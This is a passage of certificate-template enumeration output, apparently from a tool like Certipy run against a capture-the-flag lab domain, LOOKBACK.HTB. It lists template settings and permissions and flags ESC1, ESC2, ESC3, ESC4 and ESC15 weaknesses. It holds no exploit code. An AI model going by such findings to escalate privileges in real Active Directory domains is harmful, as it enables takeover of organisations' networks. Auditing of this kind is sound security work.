        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  11
    Template Name                       : ExchangeUserSignature
    Display Name                        : Exchange Signature Only
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Secure Email
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  12
    Template Name                       : ExchangeUser
    Display Name                        : Exchange User
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Secure Email
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  13
    Template Name                       : CEPEncryption
    Display Name                        : CEP Encryption
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  14
    Template Name                       : OfflineRouter
    Display Name                        : Router (Offline request)
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  15
    Template Name                       : IPSECIntermediateOffline
    Display Name                        : IPSec (Offline request)
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : IP security IKE intermediate
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  16
    Template Name                       : IPSECIntermediateOnline
    Display Name                        : IPSec
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : IP security IKE intermediate
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  17
    Template Name                       : SubCA
    Display Name                        : Subordinate Certification Authority
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
      ESC2                              : Template can be used for any purpose.
      ESC3                              : Template has Certificate Request Agent EKU set.
      ESC15                             : Enrollee supplies subject and schema version is 1.
      ESC4                              : Template is owned by user.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
  18
    Template Name                       : CA
    Display Name                        : Root Certification Authority
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  19
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
      ESC4                              : Template is owned by user.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
  20
    Template Name                       : DomainController
    Display Name                        : Domain Controller
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDirectoryGuid
                                          SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
    [*] Remarks
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
  21
    Template Name                       : Machine
    Display Name                        : Computer
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
    [*] Remarks
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
  22
    Template Name                       : MachineEnrollmentAgent
    Display Name                        : Enrollment Agent (Computer)
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  23
    Template Name                       : EnrollmentAgentOffline
    Display Name                        : Exchange Enrollment Agent (Offline request)
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  24
    Template Name                       : EnrollmentAgent
    Display Name                        : Enrollment Agent
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  25
    Template Name                       : CTLSigning
    Display Name                        : Trust List Signing
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Microsoft Trust List Signing
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  26
    Template Name                       : CodeSigning
    Display Name                        : Code Signing
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Code Signing
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  27
    Template Name                       : EFSRecovery
    Display Name                        : EFS Recovery Agent
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : File Recovery
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  28
    Template Name                       : Administrator
    Display Name                        : Administrator
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Microsoft Trust List Signing
                                          Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
    [*] Remarks
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
  29
    Template Name                       : EFS
    Display Name                        : Basic EFS
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
